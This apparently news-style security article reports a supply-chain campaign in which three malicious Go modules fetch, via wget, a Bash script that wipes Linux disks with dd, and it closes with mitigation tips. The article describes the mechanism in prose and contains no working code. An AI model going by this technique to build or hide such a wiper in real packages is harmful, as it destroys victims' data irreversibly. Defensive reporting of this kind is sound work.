Linux servers Under Attack: Disk-Wiping Malware in Go Modules
CAPITAL — May 9, 2024 — A sophisticated supply-chain attack is currently targeting Linux servers, unleashing disk-wiping malware through malicious Go modules on GitHub. Detected last month, the campaign utilizes three carefully crafted modules designed to execute destructive payloads. This attack can lead to irreversible data loss and system failure.As experts in cybersecurity, we explain further.
Linux Servers Under Attack: Disk-Wiping Malware Hidden in Go Modules
A complex supply-chain attack is targeting Linux servers, deploying disk-wiping malware through malicious Golang modules published on GitHub. This campaign, detected last month, leverages three carefully crafted Go modules containing highly obfuscated code
designed too retrieve and execute remote payloads.
The Destructive Payload: complete Disk Destruction
The attack is specifically engineered for linux-based servers and developer environments. The destructive payload, a Bash script named done.sh, employs the ‘dd’ command to overwrite the entire disk wiht zeroes. This process leads to irreversible data loss and system failure.
Before execution, the payload verifies it is indeed running within a linux environment (runtime.GOOS == “linux”). This check ensures the malware targets the intended systems.
According to an analysis by Socket, a supply-chain security company, the command overwrites every byte of data on the primary storage volume, /dev/sda. This volume typically houses critical system data, user files, databases, and configurations.
By populating the entire disk with zeros, the script fully destroys the file system structure, operating system, and all user data, rendering the system unbootable and unrecoverable.
Compromised Go Modules
Researchers discovered the attack in April, identifying three malicious Go modules on GitHub. These modules have sence been removed from the platform:
- github[.]com/truthfulpharm/prototransform
- github[.]com/blankloggia/go-mcp
- github[.]com/steelpoor/tlsproxy
Each module contained obfuscated code that, when decoded, revealed commands using ‘wget’ to download the malicious data-wiping script (either /bin/bash or /bin/sh).
Socket researchers noted that the payloads are executed immediately after download, leaving virtually no time for response or recovery.
The malicious Go modules appear to have impersonated legitimate projects:
- Prototransform: A project for converting message data to various formats.
- go-mcp: A Go implementation of the Model Context Protocol.
- tlsproxy: A TLS proxy tool providing encryption for TCP and HTTP servers.
The Go Ecosystem: A Vulnerable Landscape
Socket researchers warn that even minimal exposure to these destructive modules can lead to complete data loss.
The decentralized nature of the Go ecosystem, lacking robust checks, allows packages from different developers to share similar names. Attackers exploit this by creating module namespaces that appear legitimate, waiting for developers to integrate the malicious code into their projects.
FAQ: Protecting Your Linux Servers
Mitigation Strategies
- Implement strict dependency management policies.
- Regularly scan for vulnerabilities in your go modules.
- Verify the authenticity and integrity of third-party packages.
- Use a reputable supply chain security tool to monitor your dependencies.
- Maintain regular backups of your critical data.
